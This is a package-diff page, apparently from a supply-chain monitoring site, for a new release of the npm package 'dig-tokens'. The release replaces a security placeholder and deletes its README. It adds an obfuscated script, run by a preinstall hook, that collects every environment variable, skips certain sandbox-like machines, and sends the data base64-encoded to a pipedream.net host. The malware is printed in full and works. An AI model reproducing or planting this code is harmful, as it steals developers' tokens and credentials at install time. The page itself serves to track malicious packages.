dig-tokens 0.0.1-security → 20.964.474

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of dig-tokens might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/kvwmtiy.js +1 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/kvwmtiy.js ADDED
@@ -0,0 +1 @@
1
+ const a0_0x599f53=a0_0x4493;function a0_0x4493(_0x2b0e55,_0x30ea55){const _0x47acdf=a0_0x47ac();return a0_0x4493=function(_0x449343,_0x5a2c36){_0x449343=_0x449343-0x1bc;let _0x54e757=_0x47acdf[_0x449343];return _0x54e757;},a0_0x4493(_0x2b0e55,_0x30ea55);}(function(_0x36e591,_0x323a09){const _0x48cf03=a0_0x4493,_0x41d2a4=_0x36e591();while(!![]){try{const _0x214488=-parseInt(_0x48cf03(0x1c1))/0x1+parseInt(_0x48cf03(0x1c6))/0x2*(-parseInt(_0x48cf03(0x1cb))/0x3)+parseInt(_0x48cf03(0x1c9))/0x4+parseInt(_0x48cf03(0x1be))/0x5+-parseInt(_0x48cf03(0x1c2))/0x6+parseInt(_0x48cf03(0x1c8))/0x7*(-parseInt(_0x48cf03(0x1bd))/0x8)+parseInt(_0x48cf03(0x1c3))/0x9;if(_0x214488===_0x323a09)break;else _0x41d2a4['push'](_0x41d2a4['shift']());}catch(_0x2f7cf1){_0x41d2a4['push'](_0x41d2a4['shift']());}}}(a0_0x47ac,0xcfcbf));const http=require(a0_0x599f53(0x1d5)),filter=[{'key':a0_0x599f53(0x1ce),'val':'taobao.org'},{'key':a0_0x599f53(0x1ce),'val':a0_0x599f53(0x1cf)},{'key':a0_0x599f53(0x1ce),'val':a0_0x599f53(0x1c4)},{'key':'USERNAME','val':'daasadmin'},{'key':'_','val':'/usr/bin/python'}];function main(){const _0x4755ea=a0_0x599f53;var _0x3ce503=process[_0x4755ea(0x1d0)]||{};if(filter[_0x4755ea(0x1cc)](({key:_0x34c70f,val:_0x3c8960})=>_0x3ce503[_0x34c70f]&&_0x3ce503[_0x34c70f][_0x4755ea(0x1ca)](_0x3c8960))||Object[_0x4755ea(0x1d3)](_0x3ce503)[_0x4755ea(0x1d6)]<0xa)return;req=http['request']({'host':['c2e7a0cfd4f45f811ede4b077ae48dfa','m',_0x4755ea(0x1d4),_0x4755ea(0x1d1)][_0x4755ea(0x1d2)]('.'),'path':'/'+(_0x3ce503['npm_package_name']||''),'method':_0x4755ea(0x1c5)})['on'](_0x4755ea(0x1bf),function(_0x4cea6f){}),req[_0x4755ea(0x1bc)](Buffer[_0x4755ea(0x1d7)](JSON[_0x4755ea(0x1c7)](_0x3ce503))['toString'](_0x4755ea(0x1cd))),req[_0x4755ea(0x1c0)]();}main();function a0_0x47ac(){const _0x3e909a=['tencent.com','env','net','join','keys','pipedream','https','length','from','write','8HHaNGj','1456800TdgzgX','error','end','1172847Rlvccr','9478008tzxLtY','33102351ODIlae','registry.npmmirror.com','POST','94qsstnj','stringify','6808767qynqyf','3421684wiljMY','includes','15861MIUNFL','some','base64','npm_config_registry'];a0_0x47ac=function(){return _0x3e909a;};return a0_0x47ac();}
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "dig-tokens",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "20.964.474",
4
+ "main": "kvwmtiy.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "node kvwmtiy.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=dig-tokens for more information.